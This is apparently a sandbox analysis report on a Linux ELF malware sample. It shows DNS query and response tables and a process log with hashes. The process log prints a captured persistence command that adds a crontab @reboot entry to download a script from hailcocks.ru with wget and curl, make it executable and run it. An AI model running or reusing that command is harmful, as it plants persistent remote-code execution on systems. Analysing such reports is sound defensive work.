Nov 9, 2024 23:04:10.915724039 CET | 55486 | 53 | 192.168.2.23 | 81.169.136.222 |
Nov 9, 2024 23:04:10.943531990 CET | 53 | 55486 | 81.169.136.222 | 192.168.2.23 |
Nov 9, 2024 23:04:17.311188936 CET | 44363 | 53 | 192.168.2.23 | 5.161.109.23 |
Nov 9, 2024 23:04:22.317528009 CET | 58671 | 53 | 192.168.2.23 | 202.61.197.122 |
Nov 9, 2024 23:04:22.328210115 CET | 53 | 58671 | 202.61.197.122 | 192.168.2.23 |
Nov 9, 2024 23:04:28.717122078 CET | 44014 | 53 | 192.168.2.23 | 185.181.61.24 |
Nov 9, 2024 23:04:28.750224113 CET | 53 | 44014 | 185.181.61.24 | 192.168.2.23 |
Nov 9, 2024 23:04:34.714863062 CET | 58720 | 53 | 192.168.2.23 | 139.84.165.176 |
Nov 9, 2024 23:04:39.720645905 CET | 42993 | 53 | 192.168.2.23 | 70.34.254.19 |
Nov 9, 2024 23:04:44.726309061 CET | 42688 | 53 | 192.168.2.23 | 80.152.203.134 |
Nov 9, 2024 23:04:44.786645889 CET | 53 | 42688 | 80.152.203.134 | 192.168.2.23 |
Nov 9, 2024 23:04:50.690912962 CET | 46818 | 53 | 192.168.2.23 | 64.176.6.48 |
Nov 9, 2024 23:04:55.694192886 CET | 43669 | 53 | 192.168.2.23 | 64.176.6.48 |
Nov 9, 2024 23:05:00.700339079 CET | 58125 | 53 | 192.168.2.23 | 152.53.15.127 |
Nov 9, 2024 23:05:00.710652113 CET | 53 | 58125 | 152.53.15.127 | 192.168.2.23 |
Nov 9, 2024 23:05:06.614775896 CET | 33366 | 53 | 192.168.2.23 | 65.21.1.106 |
Nov 9, 2024 23:05:06.641166925 CET | 53 | 33366 | 65.21.1.106 | 192.168.2.23 |
Nov 9, 2024 23:05:12.529377937 CET | 47398 | 53 | 192.168.2.23 | 152.53.15.127 |
Nov 9, 2024 23:05:12.540266037 CET | 53 | 47398 | 152.53.15.127 | 192.168.2.23 |
Nov 9, 2024 23:05:18.446301937 CET | 53046 | 53 | 192.168.2.23 | 70.34.254.19 |
Nov 9, 2024 23:05:23.452819109 CET | 42232 | 53 | 192.168.2.23 | 194.36.144.87 |
Nov 9, 2024 23:05:23.463280916 CET | 53 | 42232 | 194.36.144.87 | 192.168.2.23 |
Nov 9, 2024 23:05:29.462748051 CET | 42924 | 53 | 192.168.2.23 | 139.84.165.176 |
Nov 9, 2024 23:05:34.468481064 CET | 46800 | 53 | 192.168.2.23 | 139.84.165.176 |
Nov 9, 2024 23:05:39.474741936 CET | 48346 | 53 | 192.168.2.23 | 70.34.254.19 |
Nov 9, 2024 23:05:44.481156111 CET | 47531 | 53 | 192.168.2.23 | 178.254.22.166 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 9, 2024 23:03:49.493223906 CET | 192.168.2.23 | 139.84.165.176 | 0x9b91 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:03:54.498627901 CET | 192.168.2.23 | 80.152.203.134 | 0xf515 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:04:00.903851986 CET | 192.168.2.23 | 137.220.52.23 | 0xb1ca | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:04:05.909435987 CET | 192.168.2.23 | 70.34.254.19 | 0x4453 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:04:10.915724039 CET | 192.168.2.23 | 81.169.136.222 | 0xc91 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:04:17.311188936 CET | 192.168.2.23 | 5.161.109.23 | 0x5e09 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:04:22.317528009 CET | 192.168.2.23 | 202.61.197.122 | 0x7785 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:04:28.717122078 CET | 192.168.2.23 | 185.181.61.24 | 0x5ecd | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:04:34.714863062 CET | 192.168.2.23 | 139.84.165.176 | 0x2a4d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:04:39.720645905 CET | 192.168.2.23 | 70.34.254.19 | 0x86e3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:04:44.726309061 CET | 192.168.2.23 | 80.152.203.134 | 0xff27 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:04:50.690912962 CET | 192.168.2.23 | 64.176.6.48 | 0x321c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:04:55.694192886 CET | 192.168.2.23 | 64.176.6.48 | 0x22a0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:05:00.700339079 CET | 192.168.2.23 | 152.53.15.127 | 0x3f48 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:05:06.614775896 CET | 192.168.2.23 | 65.21.1.106 | 0x2281 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:05:12.529377937 CET | 192.168.2.23 | 152.53.15.127 | 0xac8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:05:18.446301937 CET | 192.168.2.23 | 70.34.254.19 | 0xca69 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:05:23.452819109 CET | 192.168.2.23 | 194.36.144.87 | 0xc3fc | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:05:29.462748051 CET | 192.168.2.23 | 139.84.165.176 | 0x3078 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:05:34.468481064 CET | 192.168.2.23 | 139.84.165.176 | 0xe68b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:05:39.474741936 CET | 192.168.2.23 | 70.34.254.19 | 0xfae8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 9, 2024 23:05:44.481156111 CET | 192.168.2.23 | 178.254.22.166 | 0x6e1e | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 9, 2024 23:03:54.545224905 CET | 80.152.203.134 | 192.168.2.23 | 0xf515 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:03:54.545224905 CET | 80.152.203.134 | 192.168.2.23 | 0xf515 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:03:54.545224905 CET | 80.152.203.134 | 192.168.2.23 | 0xf515 | No error (0) | 217.28.130.41 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:03:54.545224905 CET | 80.152.203.134 | 192.168.2.23 | 0xf515 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:03:54.545224905 CET | 80.152.203.134 | 192.168.2.23 | 0xf515 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:03:54.545224905 CET | 80.152.203.134 | 192.168.2.23 | 0xf515 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:03:54.545224905 CET | 80.152.203.134 | 192.168.2.23 | 0xf515 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:03:54.545224905 CET | 80.152.203.134 | 192.168.2.23 | 0xf515 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:03:54.545224905 CET | 80.152.203.134 | 192.168.2.23 | 0xf515 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:10.943531990 CET | 81.169.136.222 | 192.168.2.23 | 0xc91 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:10.943531990 CET | 81.169.136.222 | 192.168.2.23 | 0xc91 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:10.943531990 CET | 81.169.136.222 | 192.168.2.23 | 0xc91 | No error (0) | 217.28.130.41 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:10.943531990 CET | 81.169.136.222 | 192.168.2.23 | 0xc91 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:10.943531990 CET | 81.169.136.222 | 192.168.2.23 | 0xc91 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:10.943531990 CET | 81.169.136.222 | 192.168.2.23 | 0xc91 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:10.943531990 CET | 81.169.136.222 | 192.168.2.23 | 0xc91 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:10.943531990 CET | 81.169.136.222 | 192.168.2.23 | 0xc91 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:10.943531990 CET | 81.169.136.222 | 192.168.2.23 | 0xc91 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:22.328210115 CET | 202.61.197.122 | 192.168.2.23 | 0x7785 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:22.328210115 CET | 202.61.197.122 | 192.168.2.23 | 0x7785 | No error (0) | 217.28.130.41 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:22.328210115 CET | 202.61.197.122 | 192.168.2.23 | 0x7785 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:22.328210115 CET | 202.61.197.122 | 192.168.2.23 | 0x7785 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:22.328210115 CET | 202.61.197.122 | 192.168.2.23 | 0x7785 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:22.328210115 CET | 202.61.197.122 | 192.168.2.23 | 0x7785 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:22.328210115 CET | 202.61.197.122 | 192.168.2.23 | 0x7785 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:22.328210115 CET | 202.61.197.122 | 192.168.2.23 | 0x7785 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:22.328210115 CET | 202.61.197.122 | 192.168.2.23 | 0x7785 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:28.750224113 CET | 185.181.61.24 | 192.168.2.23 | 0x5ecd | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:28.750224113 CET | 185.181.61.24 | 192.168.2.23 | 0x5ecd | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:28.750224113 CET | 185.181.61.24 | 192.168.2.23 | 0x5ecd | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:28.750224113 CET | 185.181.61.24 | 192.168.2.23 | 0x5ecd | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:28.750224113 CET | 185.181.61.24 | 192.168.2.23 | 0x5ecd | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:28.750224113 CET | 185.181.61.24 | 192.168.2.23 | 0x5ecd | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:28.750224113 CET | 185.181.61.24 | 192.168.2.23 | 0x5ecd | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:28.750224113 CET | 185.181.61.24 | 192.168.2.23 | 0x5ecd | No error (0) | 217.28.130.41 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:28.750224113 CET | 185.181.61.24 | 192.168.2.23 | 0x5ecd | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:44.786645889 CET | 80.152.203.134 | 192.168.2.23 | 0xff27 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:44.786645889 CET | 80.152.203.134 | 192.168.2.23 | 0xff27 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:44.786645889 CET | 80.152.203.134 | 192.168.2.23 | 0xff27 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:44.786645889 CET | 80.152.203.134 | 192.168.2.23 | 0xff27 | No error (0) | 217.28.130.41 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:44.786645889 CET | 80.152.203.134 | 192.168.2.23 | 0xff27 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:44.786645889 CET | 80.152.203.134 | 192.168.2.23 | 0xff27 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:44.786645889 CET | 80.152.203.134 | 192.168.2.23 | 0xff27 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:44.786645889 CET | 80.152.203.134 | 192.168.2.23 | 0xff27 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:04:44.786645889 CET | 80.152.203.134 | 192.168.2.23 | 0xff27 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:00.710652113 CET | 152.53.15.127 | 192.168.2.23 | 0x3f48 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:00.710652113 CET | 152.53.15.127 | 192.168.2.23 | 0x3f48 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:00.710652113 CET | 152.53.15.127 | 192.168.2.23 | 0x3f48 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:00.710652113 CET | 152.53.15.127 | 192.168.2.23 | 0x3f48 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:00.710652113 CET | 152.53.15.127 | 192.168.2.23 | 0x3f48 | No error (0) | 217.28.130.41 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:00.710652113 CET | 152.53.15.127 | 192.168.2.23 | 0x3f48 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:00.710652113 CET | 152.53.15.127 | 192.168.2.23 | 0x3f48 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:00.710652113 CET | 152.53.15.127 | 192.168.2.23 | 0x3f48 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:00.710652113 CET | 152.53.15.127 | 192.168.2.23 | 0x3f48 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:06.641166925 CET | 65.21.1.106 | 192.168.2.23 | 0x2281 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:06.641166925 CET | 65.21.1.106 | 192.168.2.23 | 0x2281 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:06.641166925 CET | 65.21.1.106 | 192.168.2.23 | 0x2281 | No error (0) | 217.28.130.41 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:06.641166925 CET | 65.21.1.106 | 192.168.2.23 | 0x2281 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:06.641166925 CET | 65.21.1.106 | 192.168.2.23 | 0x2281 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:06.641166925 CET | 65.21.1.106 | 192.168.2.23 | 0x2281 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:06.641166925 CET | 65.21.1.106 | 192.168.2.23 | 0x2281 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:06.641166925 CET | 65.21.1.106 | 192.168.2.23 | 0x2281 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:06.641166925 CET | 65.21.1.106 | 192.168.2.23 | 0x2281 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:12.540266037 CET | 152.53.15.127 | 192.168.2.23 | 0xac8 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:12.540266037 CET | 152.53.15.127 | 192.168.2.23 | 0xac8 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:12.540266037 CET | 152.53.15.127 | 192.168.2.23 | 0xac8 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:12.540266037 CET | 152.53.15.127 | 192.168.2.23 | 0xac8 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:12.540266037 CET | 152.53.15.127 | 192.168.2.23 | 0xac8 | No error (0) | 217.28.130.41 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:12.540266037 CET | 152.53.15.127 | 192.168.2.23 | 0xac8 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:12.540266037 CET | 152.53.15.127 | 192.168.2.23 | 0xac8 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:12.540266037 CET | 152.53.15.127 | 192.168.2.23 | 0xac8 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:12.540266037 CET | 152.53.15.127 | 192.168.2.23 | 0xac8 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:23.463280916 CET | 194.36.144.87 | 192.168.2.23 | 0xc3fc | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:23.463280916 CET | 194.36.144.87 | 192.168.2.23 | 0xc3fc | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:23.463280916 CET | 194.36.144.87 | 192.168.2.23 | 0xc3fc | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:23.463280916 CET | 194.36.144.87 | 192.168.2.23 | 0xc3fc | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:23.463280916 CET | 194.36.144.87 | 192.168.2.23 | 0xc3fc | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:23.463280916 CET | 194.36.144.87 | 192.168.2.23 | 0xc3fc | No error (0) | 217.28.130.41 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:23.463280916 CET | 194.36.144.87 | 192.168.2.23 | 0xc3fc | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:23.463280916 CET | 194.36.144.87 | 192.168.2.23 | 0xc3fc | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Nov 9, 2024 23:05:23.463280916 CET | 194.36.144.87 | 192.168.2.23 | 0xc3fc | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 22:03:49 |
Start date (UTC): | 09/11/2024 |
Path: | /tmp/nshsh4.elf |
Arguments: | /tmp/nshsh4.elf |
File size: | 4139976 bytes |
MD5 hash: | 8943e5f8f8c280467b4472c15ae93ba9 |
Start time (UTC): | 22:03:49 |
Start date (UTC): | 09/11/2024 |
Path: | /tmp/nshsh4.elf |
Arguments: | - |
File size: | 4139976 bytes |
MD5 hash: | 8943e5f8f8c280467b4472c15ae93ba9 |
Start time (UTC): | 22:03:49 |
Start date (UTC): | 09/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 22:03:49 |
Start date (UTC): | 09/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 22:03:49 |
Start date (UTC): | 09/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 22:03:49 |
Start date (UTC): | 09/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 22:03:49 |
Start date (UTC): | 09/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 22:03:49 |
Start date (UTC): | 09/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 22:03:49 |
Start date (UTC): | 09/11/2024 |
Path: | /tmp/nshsh4.elf |
Arguments: | - |
File size: | 4139976 bytes |
MD5 hash: | 8943e5f8f8c280467b4472c15ae93ba9 |
Start time (UTC): | 22:03:49 |
Start date (UTC): | 09/11/2024 |
Path: | /tmp/nshsh4.elf |
Arguments: | - |
File size: | 4139976 bytes |
MD5 hash: | 8943e5f8f8c280467b4472c15ae93ba9 |
Start time (UTC): | 22:03:49 |
Start date (UTC): | 09/11/2024 |
Path: | /tmp/nshsh4.elf |
Arguments: | - |
File size: | 4139976 bytes |
MD5 hash: | 8943e5f8f8c280467b4472c15ae93ba9 |